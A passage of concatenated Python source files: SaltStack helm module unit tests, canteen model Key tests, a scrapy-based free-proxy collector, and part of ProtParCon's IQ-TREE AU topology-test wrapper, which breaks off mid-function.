        )

def test_repo_remove(self):
    """`helm.repo_remove` runs `repo remove <name>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.repo_remove("name"))
        self.assertEqual(
            [call(commands=["repo", "remove", "name"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_repo_update(self):
    """`helm.repo_update` runs `repo update` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.repo_update())
        self.assertEqual(
            [call(commands=["repo", "update"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )
# Tests for helm.repo_manage: these patch repo_list / repo_add / repo_remove
# directly (rather than the executors) and check the summary dict that
# repo_manage builds ({present, added, absent, removed, failed}).
def test_repo_manage_present_bad_list(self):
    """A non-dict entry in `present` must raise CommandExecutionError."""
    with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
        with self.assertRaises(CommandExecutionError):
            helm.repo_manage(present=["test"])

def test_repo_manage_present_bad_format(self):
    """A `present` entry missing the expected keys must raise CommandExecutionError."""
    with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
        with self.assertRaises(CommandExecutionError):
            helm.repo_manage(present=[{"test": True}])

def test_repo_manage_present_failed(self):
    """If repo_add does not return True, the repo lands in `failed`."""
    result_wanted = {
        "present": [],
        "added": [],
        "absent": [],
        "removed": [],
        "failed": [{"name": "myname", "url": "myurl"}],
    }
    with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
        with patch("salt.modules.helm.repo_add", MagicMock(return_value="failed")):
            self.assertEqual(
                helm.repo_manage(present=[{"name": "myname", "url": "myurl"}]),
                result_wanted,
            )

def test_repo_manage_present_succeed(self):
    """If repo_add returns True, the repo lands in `added`."""
    result_wanted = {
        "present": [],
        "added": [{"name": "myname", "url": "myurl"}],
        "absent": [],
        "removed": [],
        "failed": [],
    }
    with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
        with patch("salt.modules.helm.repo_add", MagicMock(return_value=True)):
            self.assertEqual(
                helm.repo_manage(present=[{"name": "myname", "url": "myurl"}]),
                result_wanted,
            )

def test_repo_manage_present_already_present(self):
    """A repo already returned by repo_list stays in `present` untouched."""
    result_wanted = {
        "present": [{"name": "myname", "url": "myurl"}],
        "added": [],
        "absent": [],
        "removed": [],
        "failed": [],
    }
    with patch(
        "salt.modules.helm.repo_list",
        MagicMock(return_value=[{"name": "myname", "url": "myurl"}]),
    ):
        self.assertEqual(
            helm.repo_manage(present=[{"name": "myname", "url": "myurl"}]),
            result_wanted,
        )

def test_repo_manage_prune(self):
    """With prune=True, repos not in `present` are removed (land in `removed`)."""
    result_wanted = {
        "present": [],
        "added": [],
        "absent": [],
        "removed": ["myname"],
        "failed": [],
    }
    with patch(
        "salt.modules.helm.repo_list",
        MagicMock(return_value=[{"name": "myname", "url": "myurl"}]),
    ):
        with patch("salt.modules.helm.repo_remove", MagicMock(return_value=True)):
            self.assertEqual(helm.repo_manage(prune=True), result_wanted)

def test_repo_manage_absent(self):
    """If repo_remove returns False the repo is reported under `absent`."""
    result_wanted = {
        "present": [],
        "added": [],
        "absent": ["myname"],
        "removed": [],
        "failed": [],
    }
    with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
        with patch("salt.modules.helm.repo_remove", MagicMock(return_value=False)):
            self.assertEqual(helm.repo_manage(absent=["myname"]), result_wanted)

def test_repo_manage_removed(self):
    """If repo_remove returns True the repo is reported under `removed`."""
    result_wanted = {
        "present": [],
        "added": [],
        "absent": [],
        "removed": ["myname"],
        "failed": [],
    }
    with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
        with patch("salt.modules.helm.repo_remove", MagicMock(return_value=True)):
            self.assertEqual(helm.repo_manage(absent=["myname"]), result_wanted)
# Remaining delegation tests, same mock-the-executor pattern as above.
def test_rollback(self):
    """`helm.rollback` runs `rollback <release> <revision>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.rollback("release", "revision"))
        self.assertEqual(
            [
                call(
                    commands=["rollback", "release", "revision"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_search_hub(self):
    """`helm.search_hub` runs `search hub <keyword>` via the dict executor."""
    magic_mock = MagicMock(return_value={"test": True})
    with patch("salt.modules.helm._exec_dict_return", magic_mock):
        self.assertEqual({"test": True}, helm.search_hub("keyword"))
        self.assertEqual(
            [call(commands=["search", "hub", "keyword"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_search_repo(self):
    """`helm.search_repo` runs `search repo <keyword>` via the dict executor."""
    magic_mock = MagicMock(return_value={"test": True})
    with patch("salt.modules.helm._exec_dict_return", magic_mock):
        self.assertEqual({"test": True}, helm.search_repo("keyword"))
        self.assertEqual(
            [
                call(
                    commands=["search", "repo", "keyword"], flags=None, kvflags=None
                )
            ],
            magic_mock.mock_calls,
        )

def test_show_all(self):
    """`helm.show_all` runs `show all <chart>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.show_all("chart"))
        self.assertEqual(
            [call(commands=["show", "all", "chart"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_show_chart(self):
    """`helm.show_chart` runs `show chart <chart>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.show_chart("chart"))
        self.assertEqual(
            [call(commands=["show", "chart", "chart"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_show_readme(self):
    """`helm.show_readme` runs `show readme <chart>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.show_readme("chart"))
        self.assertEqual(
            [call(commands=["show", "readme", "chart"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_show_values(self):
    """`helm.show_values` runs `show values <chart>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.show_values("chart"))
        self.assertEqual(
            [call(commands=["show", "values", "chart"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_status(self):
    """`helm.status` runs `status <release>` via the dict executor."""
    magic_mock = MagicMock(return_value={"test": True})
    with patch("salt.modules.helm._exec_dict_return", magic_mock):
        self.assertEqual({"test": True}, helm.status("release"))
        self.assertEqual(
            [call(commands=["status", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_template(self):
    """`helm.template` runs `template <name> <chart>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.template("name", "chart"))
        self.assertEqual(
            [
                call(
                    commands=["template", "name", "chart"], flags=None, kvflags=None
                )
            ],
            magic_mock.mock_calls,
        )

def test_test(self):
    """`helm.test` runs `test <release>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.test("release"))
        self.assertEqual(
            [call(commands=["test", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_uninstall(self):
    """`helm.uninstall` runs `uninstall <release>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.uninstall("release"))
        self.assertEqual(
            [call(commands=["uninstall", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_upgrade(self):
    """`helm.upgrade` runs `upgrade <release> <chart>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.upgrade("release", "chart"))
        self.assertEqual(
            [
                call(
                    commands=["upgrade", "release", "chart"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_verify(self):
    """`helm.verify` runs `verify <path>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.verify("path"))
        self.assertEqual(
            [call(commands=["verify", "path"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_version(self):
    """`helm.version` runs `version` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.version())
        self.assertEqual(
            [call(commands=["version"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )
|
<filename>canteen_tests/test_model/test_key.py
# -*- coding: utf-8 -*-
"""
model key tests
~~~~~~~~~~~~~~~
tests canteen's model keys.
:author: <NAME> <<EMAIL>>
:copyright: (c) <NAME>, 2014
:license: This software makes use of the MIT Open Source License.
A copy of this license is included as ``LICENSE.md`` in
the root of the project.
"""
# canteen keys
from canteen import model
from canteen.model import Key
from canteen.model import exceptions
from canteen.model import AbstractKey
# canteen tests
from canteen.test import FrameworkTest
## KeyTests
class KeyTests(FrameworkTest):

    """ Tests `model.Key` and `model.AbstractKey`.

    Review fixes in this class:
      * test_key_with_model_class_kind compared ``k2.id`` to itself
        (tautology) -- now compares against ``k1.id``.
      * test_key_adapter and test_key_format re-checked the class-level
        attribute under their "object level" comments -- now check the
        instance (``k`` / ``k1``) as the comments intend.
    """

    def test_construct_key(self):
        """ Test constructing a `Key` manually """
        # test kinded empty key
        k = Key("TestKind")
        self.assertEqual(k.kind, "TestKind")
        # test kinded ID'd key
        k = Key("TestKind", "sample")
        self.assertEqual(k.kind, "TestKind")
        self.assertEqual(k.id, "sample")
        # test parented, kinded ID'd key
        pk = Key("TestParentKind", "parent")
        k = Key("TestKind", "child", parent=pk)
        self.assertEqual(k.kind, "TestKind")
        self.assertEqual(k.id, "child")
        self.assertEqual(k.parent, pk)
        # make sure basic properties are ok
        self.assertEqual(k.__slots__, set())
        self.assertEqual(k.__class__.__name__, "Key")
        self.assertEqual(k.__class__.__slots__, set())

    def test_key_inheritance(self):
        """ Test proper inheritance structure for `Key` """
        # test basic key inheritance
        k = Key("TestKind", "sample")
        # test basic inheritance
        self.assertIsInstance(k, Key)
        self.assertIsInstance(k, AbstractKey)
        self.assertIsInstance(k, object)
        # test class inheritance
        self.assertTrue(issubclass(Key, AbstractKey))
        self.assertTrue(AbstractKey in Key.__bases__)
        self.assertIsInstance(Key, AbstractKey.__metaclass__)
        # check `AbstractKey` inheritance
        self.assertTrue(type(k) == Key)
        self.assertTrue(issubclass(Key, object))

    def test_key_stringify(self):
        """ Test string representation of a `Key` object """
        # build and stringify key
        k = Key("SampleKind", "sample_id")
        x = str(k)
        # make sure the kind is somewhere
        self.assertTrue(("kind" in x))
        self.assertTrue(("SampleKind" in x))
        # make sure the ID is somewhere
        self.assertTrue(("id" in x))
        self.assertTrue(("sample_id" in x))
        # make sure the key class is somewhere
        self.assertTrue(('Key' in x))

    def test_key_class_stringify(self):
        """ Test the string representation of a `Key` class """
        # build and stringify key
        x = str(Key)
        # make sure the kind is somewhere
        self.assertTrue(("kind" in x))
        # make sure the ID is somewhere
        self.assertTrue(("id" in x))
        # make sure the key class is somewhere
        self.assertTrue(('Key' in x))

    def test_abstract_key(self):
        """ Test that `AbstractKey` works abstractly """
        # should not be able to instantiate `AbstractKey`
        with self.assertRaises(exceptions.AbstractConstructionFailure):
            AbstractKey()
        self.assertIsInstance(Key(), AbstractKey)

    def test_abstract_key_concrete(self):
        """ Test that `AbstractKey` works concretely """
        # sample `Key` subclass
        class SampleKey(AbstractKey):
            """ Tests subclasses of `AbstractKey`. """
            __schema__ = ('id', 'kind')
        # perform tests
        self.assertTrue(SampleKey("Sample", "id"))
        self.assertIsInstance(SampleKey("Sample", "id"), Key)
        self.assertTrue(hasattr(SampleKey, '__schema__'))
        self.assertEqual(len(SampleKey.__schema__), 2)

    def test_key_concrete(self):
        """ Test that `Key` works concretely """
        # sample `Key` subclass
        class SampleKey(Key):
            """ Tests subclasses of `Key`. """
            __schema__ = ('id', 'kind')
        # perform tests
        self.assertTrue(SampleKey("Sample", "id"))
        self.assertIsInstance(SampleKey("Sample", "id"), Key)
        self.assertTrue(hasattr(SampleKey, '__schema__'))
        self.assertEqual(len(SampleKey.__schema__), 2)

    def test_raw_key_format(self):
        """ Test constructing a key from a raw iterable """
        # sample key
        k = Key("Sample", "sample")
        # tupled raw
        self.assertEqual(Key(raw=k.flatten()), k)
        self.assertEqual(Key.from_raw(k.flatten()), k)
        # joined raw
        joined, struct = k.flatten(True)
        self.assertEqual(Key(raw=joined), k)
        self.assertEqual(Key.from_raw(joined), k)

    def test_urlsafe_key_format(self):
        """ Test constructing a key from its encoded form """
        # sample key
        k = Key("Sample", "sample")
        # urlsafe in & out
        self.assertEqual(Key(urlsafe=k.urlsafe()), k)
        self.assertEqual(Key.from_urlsafe(k.urlsafe()), k)

    def test_key_flatten(self):
        """ Test flattening a Key into a raw iterable """
        # sample key
        k = Key("Sample", "sample")
        # flatten in & out
        self.assertEqual(Key(raw=k.flatten()), k)
        self.assertEqual(Key.from_raw(k.flatten()), k)

    def test_key_nonzero(self):
        """ Test nonzero functionality in a key """
        # sample zero key and nonzero key
        k, nk = Key("Sample"), Key("Sample", "sample")
        # key with no ID should evaluate to falsy
        self.assertTrue(nk)
        self.assertTrue(not k)

    def test_key_len(self):
        """ Test length of a `Key`, which should be 0 for an incomplete key """
        k, nk = Key("Sample"), Key("Sample", "sample")
        # a key with no ID should evaluate to 0 via len()
        self.assertEqual(len(k), 0)
        self.assertEqual(len(nk), 1)

    def test_key_with_model_class_kind(self):
        """ Test making a `Key` via using a model class as the kind """
        ## KindedModel
        # Used to test using classes for kinds in `model.Key`.
        class KindedModel(model.Model):
            """ Sample for testing key creation from model classes. """
            string = basestring
        # make keys
        k1 = model.Key("KindedModel", "test_id")
        k2 = model.Key(KindedModel, "test_id")
        ko = model.Key(KindedModel)
        # test keys
        self.assertEqual(k1.kind, "KindedModel")
        self.assertEqual(k1.id, "test_id")
        self.assertEqual(k2.kind, k1.kind)
        self.assertEqual(ko.kind, k1.kind)
        # fixed: previously asserted `k2.id == k2.id` (always true); the
        # intent is to check the class-kinded key got the same ID.
        self.assertEqual(k2.id, k1.id)

    def test_key_ancestry(self):
        """ Test `Key` ancestry mechanisms """
        # manufacture keys
        pk = model.Key("ParentKind", "parent_id")
        ck = model.Key("ChildKind", "child_id", parent=pk)
        gk = model.Key("GrandchildKind", "grandchild_id", parent=ck)
        ggk = model.Key("GreatGrandchildKind", "great_grandchild_id", parent=gk)
        # for each key, make sure parent is set
        self.assertEqual(pk.parent, None)
        self.assertEqual(ck.parent, pk)
        self.assertEqual(gk.parent, ck)
        self.assertEqual(ggk.parent, gk)
        # for each key, make sure ancestry works
        pk_ancestry = [i for i in pk.ancestry]
        ck_ancestry = [i for i in ck.ancestry]
        gk_ancestry = [i for i in gk.ancestry]
        ggk_ancestry = [i for i in ggk.ancestry]
        # test ancestry paths
        self.assertEqual(len(pk_ancestry), 1)
        self.assertEqual(len(ck_ancestry), 2)
        self.assertEqual(len(gk_ancestry), 3)
        self.assertEqual(len(ggk_ancestry), 4)
        # len of a key should always be 1 unless it has ancestry,
        # then it's the length of the ancestry chain
        self.assertEqual(len(pk), 1)
        self.assertEqual(len(ck), 2)
        self.assertEqual(len(gk), 3)
        self.assertEqual(len(ggk), 4)
        # ... however all keys should test nonzero-ness (all keys should be nonzero)
        for k in (pk, ck, gk, ggk):
            self.assertTrue(k)

    def test_key_with_overflowing_schema(self):
        """ Test construction of a `Key` with too many schema items """
        # try and make a key with a ton of arguments
        with self.assertRaises(TypeError):
            model.Key(*("SampleKind",
                        "id",
                        "coolstring",
                        "whatdowedo",
                        "whenwehave",
                        "thismanyarguments"))

    def test_key_construct_multiple_formats(self):
        """ Test construction of a `Key` with multiple formats """
        # sample key
        ok = model.Key("Sample", "sample_id")
        # try and make a key with multiple formats
        with self.assertRaises(TypeError):
            model.Key(raw=ok.flatten(False)[1], urlsafe=ok.urlsafe())

    def test_key_auto_id(self):
        """ Test an integer-based ID field """
        class AutoincrementTest(model.Model):
            """ Test that keys autoincrement properly when not assigned
                deterministic name values. """
            message = basestring, {'default': 'Hello, world!'}
        # put deterministic key
        a = AutoincrementTest(key=model.Key(AutoincrementTest.kind(),
                                            'testing-string-key'))
        dk = a.put()
        # put nondeterministic key #1
        nk = AutoincrementTest().put()
        # put nondeterministic key #2
        nk2 = AutoincrementTest().put()
        self.assertIsInstance(nk.id, int)  # nondeterministic should be an int
        self.assertIsInstance(dk.id, basestring)  # deterministic should be a string
        self.assertTrue((nk2.id > nk.id))  # should be greater

    def test_key_adapter(self):
        """ Test that the adapter is attached correctly to `Key` """
        # build test obj
        k = model.Key("TestKind", "test")
        # make sure an adapter is attached at the class level
        self.assertTrue(hasattr(model.Key, '__adapter__'))
        self.assertIsInstance(model.Key.__adapter__, model.adapter.ModelAdapter)
        # make sure the same is true at the object level
        # (fixed: previously re-checked the class attribute here)
        self.assertTrue(hasattr(k, '__adapter__'))
        self.assertIsInstance(k.__adapter__, model.adapter.ModelAdapter)

    def test_key_equality(self):
        """ Test that keys equal each other when they should """
        conditions = []
        # test with deterministic ID
        k1 = model.Key("TestKind", "blabs")
        k2 = model.Key("TestKind", "blabs")
        conditions.append((k1 == k2))
        # test kinded keys
        k3 = model.Key("TestKind")
        k4 = model.Key("TestKind")
        conditions.append((k3 == k4))
        # test ancestored keys
        k5 = model.Key("TestSubkind", "blobs", parent=k1)
        k6 = model.Key("TestSubkind", "blobs", parent=k2)
        conditions.append((k5 == k6))
        [self.assertTrue(condition) for condition in conditions]

    def test_key_inequality(self):
        """ Test that keys don't equal each other when they shouldn't """
        conditions = []
        # test with deterministic ID
        k1 = model.Key("TestKind", "blabs")
        k2 = model.Key("TestKind", "blobs")
        conditions.append((k1 != k2))
        # test kinded keys
        k3 = model.Key("TestKind")
        k4 = model.Key("TestOtherKind")
        conditions.append((k3 != k4))
        # test ancestored keys with different IDs
        k5 = model.Key("TestSubkind", "blabs", parent=k1)
        k6 = model.Key("TestSubkind", "blobs", parent=k1)
        conditions.append((k5 != k6))
        # test ancestored keys with different kinds
        k7 = model.Key("TestSubkindOne", "blabs", parent=k1)
        k8 = model.Key("TestSubkindTwo", "blabs", parent=k1)
        conditions.append((k7 != k8))
        # test ancestored keys with different parents
        k9 = model.Key("TestSubkind", "blabs", parent=k1)
        k10 = model.Key("TestSubkind", "blabs", parent=k2)
        conditions.append((k9 != k10))
        [self.assertTrue(condition) for condition in conditions]

    def test_key_format(self):
        """ Test format specification on `Key` """
        # build object
        k1 = model.Key("Test", "testkey")
        # test class
        self.assertTrue(hasattr(model.Key, '__schema__'))
        self.assertIsInstance(model.Key.__schema__, tuple)
        self.assertTrue((len(model.Key.__schema__) > 1))
        # test object
        # (fixed: previously re-checked the class attribute here)
        self.assertTrue(hasattr(k1, '__schema__'))
        self.assertIsInstance(k1.__schema__, tuple)
        self.assertTrue((len(k1.__schema__) > 1))

    def test_key_set_unknown_attribute(self):
        """ Test setting an unknown and known attribute on a `Key` """
        k = model.Key("CoolKind", "coolid")
        with self.assertRaises(AttributeError):
            k.blabble = True  # try writing unknown attribute

    def test_key_overwrite_known_attribute(self):
        """ Test overwriting a known (schema-d) attribute on a `Key` """
        k = model.Key("CoolKind", "coolid")
        with self.assertRaises(AttributeError):
            k.kind = "MyKind"
        with self.assertRaises(AttributeError):
            k.id = 10

    def test_key_set_attribute_persisted(self):
        """ Test setting a valid attribute on a persisted `Key` """
        class PersistedKeyTest(model.Model):
            """ Test model for making sure writing to a persisted key fails. """
            message = basestring, {'default': 'Hello, world!'}
        with self.assertRaises(AttributeError):
            k = PersistedKeyTest().put()
            k.id = 5
        with self.assertRaises(AttributeError):
            k = PersistedKeyTest().put()
            k._set_internal('kind', "Blabs")
        with self.assertRaises(AttributeError):
            k = PersistedKeyTest().put()
            k._set_internal("id", 25)
|
from typing import Optional, List, Type
from scrapy import signals, Spider
from scrapy.crawler import CrawlerProcess
from scrapy.signalmanager import dispatcher
from proxy_parse.proxy.abc import ABCProxyParser
from proxy_parse.spiders import (
FreeProxyListSpider,
BlogSpotSpider,
ProxySearcherSpider,
HideMySpider,
)
class ProxyParser(ABCProxyParser):
    """Collect free proxies by crawling several public sources with scrapy.

    Each spider emits items through scrapy's signal bus; every
    ``item_scraped`` signal appends the item's ``proxy`` field to
    ``self.proxies`` (see ``_crawler_results``).
    """

    # Class-level annotation kept for backward compatibility with code that
    # reads `ProxyParser.proxies`; the working list is (re)created per
    # instance in __init__ (see fix note there).
    proxies: List[str] = []

    def __init__(
        self,
        path_to_file: Optional[str] = None,
        proxy_limit: int = 0,
        scrapy_spiders: Optional[List[Type[Spider]]] = None,
        scrapy_settings: Optional[dict] = None,
    ):
        """
        :param path_to_file: Path to file to save proxies,
            if not specified, the proxies will not be saved to the file
        :param proxy_limit: Limit of returned proxies from the "parse" method,
            if 0, no limit
        :param scrapy_settings: Allows you to set custom settings for scrapy.CrawlerProcess
        :param scrapy_spiders: You can add your own spiders. Examples can be found
            in the "proxy_parser.spiders" folder
        """
        # Fixed: `proxies` used to exist only as a mutable class attribute,
        # so every ProxyParser instance shared (and kept appending to) the
        # same list across parse() runs.
        self.proxies: List[str] = []
        self.path_to_file: Optional[str] = path_to_file
        self.proxy_limit: int = proxy_limit
        if scrapy_settings:
            self.settings: Optional[dict] = scrapy_settings
        else:
            self.settings: Optional[dict] = {
                "RETRY_TIMES": 10,
                "RETRY_HTTP_CODES": [500, 503, 504, 400, 403, 404, 408],
                "LOG_ENABLED": False,
            }
        if path_to_file:
            # Fixed: derive the feed format from the LAST extension only;
            # `split(".")[1]` broke for paths with extra dots
            # (e.g. "out.v2.json" -> "v2" instead of "json").
            self.settings["FEEDS"] = {
                path_to_file: {"format": path_to_file.rsplit(".", 1)[-1]}
            }
            self.settings["FEED_EXPORT_ENCODING"] = "utf-8"
            self.settings["FEED_EXPORT_FIELDS"] = ["proxy"]
            self.settings["FEED_EXPORTERS"] = {
                "json": "proxy_parser.exporters.JsonExporter",
                "jsonlines": "proxy_parser.exporters.JsonLinesExporter",
            }
        # Fixed: ProxySearcherSpider was listed twice, so that source was
        # crawled twice on every parse() run.
        self.spiders = [
            FreeProxyListSpider,
            BlogSpotSpider,
            ProxySearcherSpider,
            HideMySpider,
        ]
        if scrapy_spiders:
            self.spiders.extend(scrapy_spiders)

    def parse(self) -> List[str]:
        """
        :return: List of verified proxies
        """
        self._write_to_file("start")
        dispatcher.connect(self._crawler_results, signal=signals.item_scraped)
        process = CrawlerProcess(settings=self.settings)
        for spider in self.spiders:
            process.crawl(spider)
        # Blocks until all spiders have finished.
        process.start()
        if self.proxy_limit:
            self.proxies = self.proxies[: self.proxy_limit]
        self._write_to_file("finish")
        return self.proxies

    def _write_to_file(self, action: str) -> None:
        """Open/close the JSON array brackets around scrapy's feed output.

        Only applies to local ``.json`` feeds; remote targets (ftp/s3/gs)
        are handled entirely by scrapy.
        """
        if not self.path_to_file or self.path_to_file.startswith(("ftp", "s3", "gs")):
            return
        if action == "start":
            if self.path_to_file.endswith(".json"):
                with open(self.path_to_file, "wb") as file:
                    file.write(b"[")
            return
        if self.path_to_file.endswith(".json"):
            with open(self.path_to_file, "ab+") as file:
                # Drop the trailing byte left by the exporter, then close
                # the JSON array.
                file.truncate(file.tell() - 1)
                file.write(b"\n]")

    def _crawler_results(self, signal, sender, item, response, spider) -> None:
        # scrapy `item_scraped` callback: collect the scraped proxy string.
        self.proxies.append(item["proxy"])
|
<reponame>iBiology/ProtParCon
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Providing a common interface for performing topology test (`AU test`_) over
protein alignments using various programs.
Users are asked to provide a multiple sequence alignment (MSA) file, a NEWICK
format tree file, and a topology test program's executable. If only one tree
in the tree file was provided, a maximum-likelihood (ML) tree would be inferred
and AU test will be performed to test the difference between the user specified
tree and the ML tree. If a set of trees in NEWICK format was provided in the
tree file, only these trees would be evaluated without reconstructing the ML
tree. In both cases, only the p-value of AU test for the first tree will be
returned.
Users are encouraged to use only the function ``aut()`` and to avoid using
any private functions inside the module. However, users may implement new
private functions for additional topology test programs they are interested
in, and incorporate them into the general-purpose function ``aut()``.
.. _`AU test`: https://academic.oup.com/sysbio/article/51/3/492/1616895
"""
import os
import sys
import shutil
import random
import logging
import tempfile
import argparse
from io import StringIO
from subprocess import PIPE, Popen
try:
from textwrap import indent
except ImportError:
from ProtParCon.utilities import indent
from ProtParCon.utilities import basename, Tree
from ProtParCon.mlt import mlt
from Bio import Phylo
# Module-wide logging configuration: always log to stdout; additionally log
# to a file when LOGFILE is set (it is empty by default, so the file handler
# is normally skipped).
LEVEL = logging.INFO
LOGFILE, LOGFILEMODE = '', 'w'
HANDLERS = [logging.StreamHandler(sys.stdout)]
if LOGFILE:
    HANDLERS.append(logging.FileHandler(filename=LOGFILE, mode=LOGFILEMODE))
logging.basicConfig(format='%(asctime)s %(levelname)s %(name)s %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S', handlers=HANDLERS, level=LEVEL)
# Shared logger plus short aliases used throughout this module.
logger = logging.getLogger('[iMC]')
warn, info, error = logger.warning, logger.info, logger.error
def _iqtree(exe, msa, tree, model, seed):
    """
    Perform topology test (AU test) using IQ-TREE_.

    :param msa: str, path to a FASTA format MSA file.
    :param tree: str, path to a NEWICK format tree file.
    :param exe: str, path to a topology test program's executable.
    :param model: str, name of the model or path of the model file.
    :param seed: int, the seed used to initiate the random number generator.
        NOTE(review): `seed` is accepted but never forwarded to IQ-TREE in
        `args` -- confirm whether a `-seed` option should be passed.
    :return: tuple, p-value of the AU test (float), first tree (string), and
        second tree (string).

    .. _IQ-TREE: www.iqtree.org/
    """

    # Count the trees in the input file (Phylo.parse returns a generator,
    # which is exhausted by this sum).
    trees = Phylo.parse(tree, 'newick')
    number = sum(1 for t in trees)
    # Scratch directory next to the MSA; removed in the `finally` below.
    wd = tempfile.mkdtemp(dir=os.path.dirname(os.path.abspath(msa)))
    args = [exe, '-s', 'msa.fasta', '-zb', '10000', '-au', '-nt', '1', '-pre',
            'autest', '-n', '0']
    if model:
        args.extend(['-m', model])
    else:
        # No model given: let IQ-TREE choose one via its model test.
        args.extend(['-m', 'TEST'])
    shutil.copy(msa, os.path.join(wd, 'msa.fasta'))
    t1, t2 = '', ''
    if number == 1:
        # Only one tree supplied: infer an ML tree and compare against it.
        info('One tree found in tree file, inferring ML tree.')
        mltree = mlt(exe, msa, model=model)
        if mltree:
            # `trees` is rebound here from generator to a file path.
            trees = os.path.join(wd, 'trees.newick')
            if isinstance(tree, str):
                with open(tree) as f1:
                    t1 = f1.readline().rstrip()
            else:
                # presumably a tree object exposing .format('newick')
                # (e.g. Bio.Phylo) -- TODO confirm against callers.
                t1 = tree.format('newick').rstrip()
            with open(trees, 'w') as o, open(mltree) as f2:
                t2 = f2.read().strip()
                o.write('{}\n{}\n'.format(t1, t2))
            args.extend(['-z', 'trees.newick'])
        else:
            error('Infer ML tree failed, AU TEST aborted.')
            sys.exit(1)
    else:
        # Multiple trees supplied: evaluate them as-is (first two recorded).
        with open(tree) as f:
            t1, t2 = f.readline().strip(), f.readline().strip()
        shutil.copy(tree, os.path.join(wd, 'trees.newick'))
        args.extend(['-z', 'trees.newick'])
    try:
        info('Running AU TEST (IQ-TREE) using the following command:\n\t'
             '{}'.format(' '.join(args)))
        process = Popen(args, cwd=wd, stdout=PIPE, stderr=PIPE,
                        universal_newlines=True)
        code = process.wait()
        if code:
            # Non-zero exit status: surface IQ-TREE's stderr and abort.
            msg = indent(process.stderr.read(), prefix='\t')
            error('Topology test (AU TEST) failed for {}\n{}'.format(msa, msg))
            sys.exit(1)
        else:
            info('Parsing tree topology test (AU TEST) results.')
            # Scan the .iqtree report: skip ahead to the 'USER TREES'
            # section, then take the row for tree #1; the second-to-last
            # column of that row is read as the AU p-value.
            with open(os.path.join(wd, 'autest.iqtree')) as f:
                for line in f:
                    if 'USER TREES' in line:
                        break
                for line in f:
                    if line.strip().startswith('1'):
                        aup = float(line.split()[-2])
                        return aup, t1, t2
                error('Parsing tree topology test (AU TEST) failed, no test'
                      'result found.')
                sys.exit(1)
    except OSError:
        error('Invalid IQ-TREE executable (exe) {}, topology test (AU TEST) '
              'failed for {}.'.format(exe, msa))
        sys.exit(1)
    finally:
        # Always clean up the scratch directory, even on sys.exit.
        shutil.rmtree(wd)
def aut(exe, msa, tree, model='', seed=0, outfile='', verbose=False):
    """
    General use function for performing topology test (AU test).

    :param msa: str, path to a FASTA format MSA file.
    :param tree: str, path to a NEWICK format tree file.
    :param exe: str, path to a topology test program's executable.
    :param model: str, name of the model or path of the model file.
    :param seed: int, the seed used to initiate the random number generator.
    :param outfile: str, path to the output file for storing test result.
        If not set, only return the result without save to a file.
    :param verbose: bool, invoke verbose or silent process mode,
        default: False, silent mode.
    :return: tuple, p-value of the AU test (float), first tree (string), and
        second tree (string).
    """

    logger.setLevel(logging.INFO if verbose else logging.ERROR)

    # Validate inputs up front; abort with a clear message on bad paths.
    if os.path.isfile(msa):
        msa = os.path.abspath(msa)
    else:
        error('Alignment {} is not a file or does not exist.'.format(msa))
        sys.exit(1)

    if not os.path.isfile(tree):
        # Fixed wording (was: "is not a file a does not exist").
        error('Tree {} is not a file or does not exist.'.format(tree))
        sys.exit(1)

    if not isinstance(model, str):
        error('Argument model accepts a string for the name of the model or '
              'path of the model file')
